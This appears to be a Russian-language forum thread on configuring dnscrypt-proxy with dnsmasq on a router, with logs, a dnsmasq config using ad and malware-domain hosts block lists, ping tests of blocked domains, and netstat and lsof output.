Sun Aug 5 11:39:29 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5 Sun Aug 5 11:39:29 2017 [INFO] Generating a new session key pair Sun Aug 5 11:39:29 2017 [INFO] Done Sun Aug 5 11:39:29 2017 [INFO] Server certificate with serial #1493333488 received Sun Aug 5 11:39:29 2017 [INFO] This certificate is valid Sun Aug 5 11:39:29 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24] Sun Aug 5 11:39:29 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Sun Aug 5 11:39:29 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778 Sun Aug 5 11:39:29 2017 [NOTICE] Proxying from 127.0.0.2:60053 to 208.67.220.220:443 Sun Aug 5 12:41:00 2017 [INFO] Refetching server certificates Sun Aug 5 12:41:00 2017 [INFO] Server certificate with serial #1493333488 received Sun Aug 5 12:41:00 2017 [INFO] This certificate is valid Sun Aug 5 12:41:00 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24] Sun Aug 5 12:41:00 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Sun Aug 5 12:41:00 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778 ....
По dnsmasq log
Скрытый текстAug 5 14:17:22 dnsmasq[7303]: compile time options: IPv6 GNU-getopt no-RTC no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth no-DNSSEC no-ID loop-detect inotify
Aug 5 14:17:22 dnsmasq[7303]: using nameserver 127.0.0.2#60053
Aug 5 14:17:23 dnsmasq[7303]: read /opt/etc/hosts - 2 addresses
Aug 5 14:17:23 dnsmasq[7303]: read /opt/tmp/mvps_block.host - 13273 addresses
Aug 5 14:17:23 dnsmasq[7303]: read /opt/tmp/malwaredom_block.host - 1157 addresses
Aug 5 14:17:23 dnsmasq[7303]: read /opt/tmp/hosts0 - 101 addresses
Aug 5 14:17:25 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:17:25 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:17:26 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:17:26 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:17:27 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:17:27 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:17:29 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:17:29 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:17:33 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:17:33 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:18:04 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
Aug 5 14:18:04 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
Aug 5 14:18:05 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
Aug 5 14:18:05 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
Aug 5 14:18:06 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
Aug 5 14:18:06 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
Aug 5 14:18:08 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
Aug 5 14:18:08 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
Aug 5 14:18:09 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:18:09 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:18:10 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:18:10 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:18:11 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
Aug 5 14:18:11 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
Aug 5 14:18:12 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
Aug 5 14:18:12 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2...
Aug 5 14:19:57 dnsmasq[7303]: query[A] fonts.googleapis.com from 192.168.1.2
Aug 5 14:19:57 dnsmasq[7303]: forwarded fonts.googleapis.com to 127.0.0.2
Aug 5 14:19:57 dnsmasq[7303]: reply fonts.googleapis.com is <CNAME>
Aug 5 14:19:57 dnsmasq[7303]: reply googleadapis.l.google.com is 173.194.222.95
Aug 5 14:19:57 dnsmasq[7303]: query[A] googleadapis.l.google.com from 192.168.1.2
Aug 5 14:19:57 dnsmasq[7303]: forwarded googleadapis.l.google.com to 127.0.0.2
Aug 5 14:19:57 dnsmasq[7303]: reply googleadapis.l.google.com is 173.194.222.95
Aug 5 14:19:57 dnsmasq[7303]: query[AAAA] googleadapis.l.google.com from 192.168.1.2
Aug 5 14:19:57 dnsmasq[7303]: forwarded googleadapis.l.google.com to 127.0.0.2
Aug 5 14:19:57 dnsmasq[7303]: reply googleadapis.l.google.com is 2a00:1450:4010:c07::5f...
Aug 5 14:20:07 dnsmasq[7303]: query[A] rbc.ru from 192.168.1.2
Aug 5 14:20:07 dnsmasq[7303]: forwarded rbc.ru to 127.0.0.2
Aug 5 14:20:07 dnsmasq[7303]: reply rbc.ru is 80.68.253.9
Aug 5 14:20:07 dnsmasq[7303]: reply rbc.ru is 185.72.229.9
Aug 5 14:20:07 dnsmasq[7303]: query[A] rbc.ru from 192.168.1.2
Aug 5 14:20:07 dnsmasq[7303]: forwarded rbc.ru to 127.0.0.2
Aug 5 14:20:07 dnsmasq[7303]: reply rbc.ru is 80.68.253.9
Aug 5 14:20:07 dnsmasq[7303]: reply rbc.ru is 185.72.229.9
Aug 5 14:20:07 dnsmasq[7303]: query[AAAA] rbc.ru from 192.168.1.2
Aug 5 14:20:07 dnsmasq[7303]: forwarded rbc.ru to 127.0.0.2
Aug 5 14:20:07 dnsmasq[7303]: query[A] www.rbc.ru from 192.168.1.2
Aug 5 14:20:07 dnsmasq[7303]: forwarded www.rbc.ru to 127.0.0.2
Aug 5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 185.72.229.11
Aug 5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 80.68.253.11
Aug 5 14:20:07 dnsmasq[7303]: query[A] www.rbc.ru from 192.168.1.2
Aug 5 14:20:07 dnsmasq[7303]: forwarded www.rbc.ru to 127.0.0.2
Aug 5 14:20:07 dnsmasq[7303]: reply rbc.ru is NODATA-IPv6
Aug 5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 185.72.229.11
Aug 5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 80.68.253.11
Aug 5 14:20:07 dnsmasq[7303]: query[AAAA] www.rbc.ru from 192.168.1.2
Aug 5 14:20:07 dnsmasq[7303]: forwarded www.rbc.ru to 127.0.0.2
Aug 5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is NODATA-IPv6...
Aug 5 14:28:39 dnsmasq[7303]: query[A] mail.radar.imgsmail.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded mail.radar.imgsmail.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] img.imgsmail.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded img.imgsmail.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] mc.yandex.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: /opt/tmp/mvps_block.host mc.yandex.ru is 0.0.0.0
Aug 5 14:28:39 dnsmasq[7303]: query[A] portal.mail.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded portal.mail.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] limg.imgsmail.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded limg.imgsmail.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] r.mradx.net from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded r.mradx.net to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] filin.mail.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded filin.mail.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: reply mail.radar.imgsmail.ru is <CNAME>
Aug 5 14:28:39 dnsmasq[7303]: reply common.radar.imgsmail.ru is 185.5.137.179
Aug 5 14:28:39 dnsmasq[7303]: reply img.imgsmail.ru is 217.69.139.101
Aug 5 14:28:39 dnsmasq[7303]: reply portal.mail.ru is 217.69.139.59
Aug 5 14:28:39 dnsmasq[7303]: reply portal.mail.ru is 94.100.180.59
Aug 5 14:28:39 dnsmasq[7303]: reply portal.mail.ru is 217.69.139.58
Aug 5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 217.69.139.209
Aug 5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 94.100.180.211
Aug 5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 217.69.139.211
Aug 5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 94.100.180.209
Aug 5 14:28:39 dnsmasq[7303]: reply r.mradx.net is 217.69.139.244
Aug 5 14:28:39 dnsmasq[7303]: query[A] pass.yandex.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded pass.yandex.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: reply filin.mail.ru is 185.5.136.33
Aug 5 14:28:39 dnsmasq[7303]: reply pass.yandex.ru is 213.180.204.51
Aug 5 14:28:39 dnsmasq[7303]: query[A] bar.love.mail.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded bar.love.mail.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] ocsp2.globalsign.com from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded ocsp2.globalsign.com to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: query[A] ok.ru from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded ok.ru to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: reply bar.love.mail.ru is 193.0.170.53
Aug 5 14:28:39 dnsmasq[7303]: reply bar.love.mail.ru is 193.0.170.54
Aug 5 14:28:39 dnsmasq[7303]: reply ocsp2.globalsign.com is <CNAME>
Aug 5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.24.216
Aug 5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.28.216
Aug 5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.25.216
Aug 5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.26.216
Aug 5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.27.216
Aug 5 14:28:39 dnsmasq[7303]: reply ok.ru is 5.61.23.11
Aug 5 14:28:39 dnsmasq[7303]: reply ok.ru is 217.20.155.13
Aug 5 14:28:39 dnsmasq[7303]: reply ok.ru is 217.20.156.167
Aug 5 14:28:39 dnsmasq[7303]: query[A] clients1.google.com from 192.168.1.2
Aug 5 14:28:39 dnsmasq[7303]: forwarded clients1.google.com to 127.0.0.2
Aug 5 14:28:39 dnsmasq[7303]: reply clients1.google.com is <CNAME>
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.78
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.69
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.72
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.66
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.65
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.70
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.73
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.64
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.71
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.68
Aug 5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.67Выяснился еще один баг или точнее не баг, а то как настроена система. Клиент ping на адрес из /opt/tmp/malwaredom_block.host - "0.0.0.0 www.w......o.com" на клиенте все нормально, но если выполнять локально на роутере, то получаем
Скрытый текст1.
с клиента если "ping www.w......o.com" имеем
Aug 6 12:01:00 dnsmasq[24293]: query[A] www.w......o.com from 192.168.1.2
Aug 6 12:01:00 dnsmasq[24293]: /opt/tmp/malwaredom_block.host www.wigglewoo.com is 0.0.0.0или если ping 0.0.0.0 то сбой передачи
2. с роутера/opt/etc/init.d # ping www.w......o.com
PING www.wigglewoo.com (85.13.149.245): 56 data bytes
64 bytes from 85.13.149.245: seq=0 ttl=59 time=64.597 ms
^C
--- www.w......o.com ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 64.597/64.597/64.597 ms
/opt/etc/init.d # ping 0.0.0.0
PING 0.0.0.0 (0.0.0.0): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.434 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.363 ms
^C
--- 0.0.0.0 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.363/0.398/0.434 ms
/opt/etc/init.d #Решение проблемы настройка более правельнее ниже
Скрытый текстDNSmasq
no-resolv
interface=br0
bind-interfaces
listen-address=192.168.1.100
except-interface=lo
server=127.0.0.2#60053
addn-hosts=/opt/tmp/hosts0
addn-hosts=/opt/tmp/malwaredom_block.host
addn-hosts=/opt/tmp/mvps_block.host
cache-size=0Теперь все правельно.
Скрытый текстиз списка malwaredom_block
/opt/etc/init.d #
/opt/etc/init.d # ping yo.......com
PING youtuhe.com (34.196.13.28): 56 data bytes
^C
--- yo.......com ping statistics ---
3 packets transmitted, 0 packets received, 100% packet loss
/opt/etc/init.d # netstat -tulap | grep dns
tcp 0 0 192.168.1.100:domain 0.0.0.0:* LISTEN 27271/dnsmasq
tcp 0 0 127.0.0.2:60053 0.0.0.0:* LISTEN 24266/dnscrypt-prox
tcp 0 0 fe80::......a8:domain :::* LISTEN 27271/dnsmasq
udp 0 0 127.0.0.2:60053 0.0.0.0:* 24266/dnscrypt-prox
udp 0 0 192.168.1.100:domain 0.0.0.0:* 27271/dnsmasq
udp 0 0 0.0.0.0:35326 0.0.0.0:* 24266/dnscrypt-prox
udp 0 0 fe80::.....a8:domain :::* 27271/dnsmasq
/opt/etc/init.d #Текущий конфиг для DNSmasq более оптимальный для работы, вопрос открытый только по какому варианту работает ПРОШИВКА если ей нужно обратиться по мнемонике - тут два варианта "localhost:domain" или по интерфейсу "br0:domain"
- 1
-
1 час назад, TheBB сказал:
нужны тесты, поставляется as is... радоваться рано
Это понятно, нужно время на оценку возможной проблемы (по сравнению с той что была) и то что она случайная или постоянная.
-
Ну вообще порадовали.
Пока все запустилось.
Скрытый текстdnsmasq 5277 nobody cwd DIR 31,4 202 71 /
dnsmasq 5277 nobody rtd DIR 31,4 202 71 /
dnsmasq 5277 nobody txt REG 8,2 282388 6321 /opt/sbin/dnsmasq
dnsmasq 5277 nobody mem REG 8,2 49680 4109 /opt/lib/libnss_files-2.25.so
dnsmasq 5277 nobody mem REG 8,2 17764 4257 /opt/lib/libmnl.so.0.2.0
dnsmasq 5277 nobody mem REG 8,2 1616316 4129 /opt/lib/libc-2.25.so
dnsmasq 5277 nobody mem REG 8,2 93848 4131 /opt/lib/libgcc_s.so.1
dnsmasq 5277 nobody mem REG 8,2 24944 4255 /opt/lib/libnfnetlink.so.0.2.0
dnsmasq 5277 nobody mem REG 8,2 118740 4253 /opt/lib/libnetfilter_conntrack.so.3.6.0
dnsmasq 5277 nobody mem REG 8,2 150220 4128 /opt/lib/ld-2.25.so
dnsmasq 5277 nobody 0u CHR 1,3 0t0 1053 /dev/null
dnsmasq 5277 nobody 1u CHR 1,3 0t0 1053 /dev/null
dnsmasq 5277 nobody 2u CHR 1,3 0t0 1053 /dev/null
dnsmasq 5277 nobody 3u netlink 0t0 91211 ROUTE
dnsmasq 5277 nobody 4u IPv4 91213 0t0 UDP 192.168.1.100:domain
dnsmasq 5277 nobody 5u IPv4 91214 0t0 TCP 192.168.1.100:domain (LISTEN)
dnsmasq 5277 nobody 6u IPv4 91215 0t0 UDP localhost:domain
dnsmasq 5277 nobody 7u IPv4 91216 0t0 TCP localhost:domain (LISTEN)
dnsmasq 5277 nobody 8u IPv6 91217 0t0 UDP [fe80::...8]:domain
dnsmasq 5277 nobody 9u IPv6 91218 0t0 TCP [fe80::...8]:domain (LISTEN)
dnsmasq 5277 nobody 10u IPv6 91219 0t0 UDP localhost:domain
dnsmasq 5277 nobody 11u IPv6 91220 0t0 TCP localhost:domain (LISTEN)
dnsmasq 5277 nobody 12r a_inode 0,7 0 4 inotify
dnsmasq 5277 nobody 13r FIFO 0,6 0t0 91225 pipe
dnsmasq 5277 nobody 14w FIFO 0,6 0t0 91225 pipe
dnsmasq 5277 nobody 15u unix 0x84c62800 0t0 89329 type=DGRAM
dnscrypt- 6047 root cwd DIR 8,2 1024 245764 /opt/etc/init.d
dnscrypt- 6047 root rtd DIR 31,4 202 71 /
dnscrypt- 6047 root txt REG 8,2 158416 6327 /opt/sbin/dnscrypt-proxy
dnscrypt- 6047 root mem REG 8,2 122696 4123 /opt/lib/libpthread-2.25.so
dnscrypt- 6047 root mem REG 8,2 1616316 4129 /opt/lib/libc-2.25.so
dnscrypt- 6047 root mem REG 8,2 93848 4131 /opt/lib/libgcc_s.so.1
dnscrypt- 6047 root mem REG 8,2 996704 4130 /opt/lib/libm-2.25.so
dnscrypt- 6047 root mem REG 8,2 10664 4120 /opt/lib/libdl-2.25.so
dnscrypt- 6047 root mem REG 8,2 464288 4357 /opt/lib/libsodium.so.18.3.0
dnscrypt- 6047 root mem REG 8,2 36628 4325 /opt/lib/libltdl.so.7.3.0
dnscrypt- 6047 root mem REG 8,2 150220 4128 /opt/lib/ld-2.25.so
dnscrypt- 6047 root 0r CHR 1,3 0t0 1053 /dev/null
dnscrypt- 6047 root 1w CHR 1,3 0t0 1053 /dev/null
dnscrypt- 6047 root 2w CHR 1,3 0t0 1053 /dev/null
dnscrypt- 6047 root 3r CHR 1,9 0t0 1070 /dev/urandom
dnscrypt- 6047 root 4u unix 0x84c62e00 0t0 99913 type=DGRAM
dnscrypt- 6047 root 5u a_inode 0,7 0 4 [eventpoll]
dnscrypt- 6047 root 6u unix 0x84c62600 0t0 99914 type=STREAM
dnscrypt- 6047 root 7u unix 0x85b0be00 0t0 99915 type=STREAM
dnscrypt- 6047 root 8r CHR 1,9 0t0 1070 /dev/urandom
dnscrypt- 6047 root 9u IPv4 99916 0t0 UDP localhost:60053
dnscrypt- 6047 root 10u IPv4 99917 0t0 UDP *:43689
dnscrypt- 6047 root 11u IPv4 99918 0t0 TCP localhost:60053 (LISTEN) -
ОК и СПС
Поставил, запустил. Разберусь с релизами сейчас.
/opt/etc/init.d # lsof | grep libsodium dnscrypt- 5301 root mem REG 8,2 464288 4357 /opt/lib/libsodium.so.18.3.0 /opt/etc/init.d #
Да это он
_sodium_malloc 1.0.13 ...
-
Я его dnscrypt proxy пока отключил переименовав скрипт запуска S* на K*, и пробую связку dnsmasq+https_dns_proxy
- 1
Отваливается LAN интерфейс.
in 2.10
Posted
По смотрите в сторону клиента, если ПК то настройки сетевой - драйвера, куча параметров возможно какой-то из них.